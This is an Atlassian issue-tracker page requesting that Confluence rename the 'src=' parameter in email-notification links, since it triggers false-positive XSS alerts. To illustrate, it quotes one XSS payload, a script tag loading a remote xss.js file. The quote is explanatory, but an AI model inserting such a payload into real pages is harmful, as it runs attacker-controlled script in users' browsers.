Uploaded image for project: 'Confluence Data Center'
  1. Confluence Data Center
  2. CONFSERVER-74327

Replacing "src=" from the links that are created for email notifications

XMLWordPrintable

    • 1
    • We collect Confluence feedback from various sources, and we evaluate what we've collected when planning our product roadmap. To understand how this piece of feedback will be reviewed, see our Implementation of New Features Policy.

      If a user used a link from a mail to navigate to the Confluence, the URL is like the below:

      https://confluence.example.com/pages/viewpage.action?pageId=123456&preview=example.pptx&src=mail&src.mail.product=confluence-server&src.mail.timestamp=160612345679&src.mail.notification=com.atlassian.confluence.plugins.confluence-file-notifications%3Afile-content-update-notification&src.mail.recipient=XYZWe&src.mail.action=view

      The src= part of the URL is created false-positive XSS alerts in the security systems as the XSS attacks can include some strings in the URLs like this:

      <script src=http://ha.ckers.org/xss.js></script>

      So replacing the src= with something like utm_source (or utm_media, etc.) that is used for the same purpose but considered safe and is a technical standard for tracking requests, would be better from the security point of view.

              Unassigned Unassigned
              9f7de485df51 Basar Beykoz (Inactive)
              Votes:
              1 Vote for this issue
              Watchers:
              1 Start watching this issue

                Created:
                Updated: